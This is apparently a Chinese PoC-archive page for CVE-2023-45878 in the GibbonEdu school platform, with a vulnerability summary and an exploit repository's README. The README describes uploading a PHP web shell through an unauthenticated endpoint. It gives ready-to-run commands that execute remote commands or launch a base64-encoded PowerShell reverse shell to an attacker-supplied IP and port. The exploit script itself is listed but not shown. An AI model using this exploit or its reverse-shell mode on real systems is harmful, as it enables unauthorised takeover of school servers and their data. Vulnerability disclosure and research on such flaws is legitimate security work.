关联漏洞
标题:
Gibbon 安全漏洞
(CVE-2023-45878)
描述:Gibbon是一个解决教育工作者每天遇到的实际问题的学校平台。 GibbonEdu Gibbon 25.0.1版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者将任意文件上传到应用程序,并在底层系统上执行代码。
描述
GibbonEdu Arbitrary File Write to Remote Code Execution
介绍
# CVE-2023-45878
**GibbonEdu Arbitrary File Write to Web Shell Execution**
## Description
This repository contains an exploit for **CVE-2023-45878**, an arbitrary file write vulnerability in [GibbonEdu](https://gibbonedu.org/). The vulnerability affects the `rubrics_visualise_saveAjax.php` endpoint and allows an unauthenticated attacker to upload arbitrary files to the web server.
This script leverages the vulnerability to upload a **PHP web shell** and either:
- Execute a **specific system command**;
- Trigger a **base64-encoded PowerShell reverse shell** to gain remote access.
---
## Usage
The script supports two modes of operation:
- `--command` (`-c`): Execute a specific system command remotely.
- `--shell` (`-s`): Trigger a PowerShell reverse shell to the attacker's listener.
---
## How to Run the Exploit
### 1. Clone the Repository
```bash
git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
```
### 2. Run the Web Shell Exploit
- Run a Remote Command:
```bash
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
```
- Trigger a PowerShell Reverse Shell:
```bash
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>
```
## Disclaimer
This script is intended for educational purposes only. Unauthorized use of this exploit on systems without permission is illegal. The author is not responsible for any misuse or damages caused by this exploit.
文件快照
[4.0K] /data/pocs/1213201c9c51680ebbcb1a96e8e6c5a3aba5999b
├── [3.6K] CVE-2023-45878.py
└── [1.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。